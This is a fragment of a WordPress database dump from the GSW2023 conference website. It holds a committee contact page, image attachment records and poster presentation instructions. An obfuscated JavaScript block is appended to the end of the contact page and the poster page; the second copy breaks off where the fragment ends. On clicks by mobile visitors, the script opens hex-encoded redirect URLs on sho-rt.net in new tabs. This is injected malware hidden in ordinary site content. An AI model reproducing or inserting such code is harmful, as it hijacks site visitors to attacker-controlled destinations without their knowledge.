!important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"133\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:17:26','2023-08-13 20:17:26','',4849,'https://gsw2023.com/?p=5166',0,'revision','',0),
(5167,1,'2023-08-13 20:44:13','2023-08-13 20:44:13','','main_u6','','inherit','open','closed','','main_u6','','','2023-08-13 20:44:13','2023-08-13 20:44:13','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u6.jpg',0,'attachment','image/jpeg',0),
(5168,1,'2023-08-13 20:45:58','2023-08-13 20:45:58','','main_u6','','inherit','open','closed','','main_u6-2','','','2023-08-13 20:45:58','2023-08-13 20:45:58','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u6-1.jpg',0,'attachment','image/jpeg',0),
(5169,1,'2023-08-13 20:47:58','2023-08-13 20:47:58','','main_u6','','inherit','open','closed','','main_u6-3','','','2023-08-13 20:47:58','2023-08-13 20:47:58','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u6-2.jpg',0,'attachment','image/jpeg',0),
(5170,1,'2023-08-13 21:02:46','2023-08-13 21:02:46','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM hours. Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program\r\nPlease remove your poster after 17:30 hours.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 